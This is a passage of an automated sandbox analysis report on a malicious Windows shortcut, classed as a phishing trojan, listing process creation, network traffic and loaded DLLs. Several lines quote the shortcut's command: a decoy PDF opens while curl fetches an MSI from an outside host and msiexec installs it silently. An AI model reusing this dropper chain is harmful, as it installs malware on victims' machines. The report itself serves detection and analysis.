      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.office.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.tiktok.com/
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://www.youtube.com
      Source: 2ba33c01-8ad1-4bb0-9362-49501484249d.tmp.12.drString found in binary or memory: https://y.music.163.com/m/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
      Source: unknownNetwork traffic detected: HTTP traffic on port 50261 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

      System Summary

      barindex
      Source: Yara matchFile source: thUKanu6GD.lnk, type: SAMPLE
      Source: thUKanu6GD.lnkLNK file: /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo %TEMP%\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i %TEMP%\bosfortuy.ms /qn | Taskkill /f /im cmd.exe
      Source: classification engineClassification label: mal92.phis.troj.evad.winLNK@63/301@15/14
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67CB59A4-1810.pmaJump to behavior
      Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\bosfortuy.msJump to behavior
      Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cmd.exe&quot;)
      Source: C:\Windows\System32\cmd.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
      Source: C:\Windows\System32\curl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: thUKanu6GD.lnkVirustotal: Detection: 19%
      Source: thUKanu6GD.lnkReversingLabs: Detection: 13%
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn | Taskkill /f /im cmd.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qn
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exe
      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3
      Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -sLo C:\Users\user\AppData\Local\Temp\bosfortuy.ms http://559236.na3.to/gift/setup4391.msiJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i C:\Users\user\AppData\Local\Temp\bosfortuy.ms /qnJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe Taskkill /f /im cmd.exeJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=2088,i,11631974867291312252,14733990971221578511,262144 /prefetch:3Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:3Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6272 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6496 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7104 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=7416 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:6Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6460 --field-trial-handle=2036,i,8024884294293731055,9197062801569010406,262144 /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: thUKanu6GD.lnkLNK file: ..\..\..\Windows\System32\cmd.exe
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Persistence and Installation Behavior

      barindex
      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
      Source: Web Data.12.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
      Source: Web Data.12.drBinary or memory string: discord.comVMware20,11696487552f
      Source: Web Data.12.drBinary or memory string: bankofamerica.comVMware20,11696487552x
      Source: Web Data.12.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
      Source: Web Data.12.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: global block list test formVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: tasks.office.comVMware20,11696487552o
      Source: curl.exe, 00000006.00000003.1291995920.000001BE71253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
      Source: Web Data.12.drBinary or memory string: AMC password management pageVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
      Source: Web Data.12.drBinary or memory string: interactivebrokers.comVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: dev.azure.comVMware20,11696487552j
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
      Source: Web Data.12.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
      Source: Web Data.12.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
      Source: Web Data.12.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
      Source: Web Data.12.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
      Source: Web Data.12.drBinary or memory string: outlook.office365.comVMware20,11696487552t
      Source: Web Data.12.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
      Source: Web Data.12.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
      Source: Web Data.12.drBinary or memory string: outlook.office.comVMware20,11696487552s
      Source: Web Data.12.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
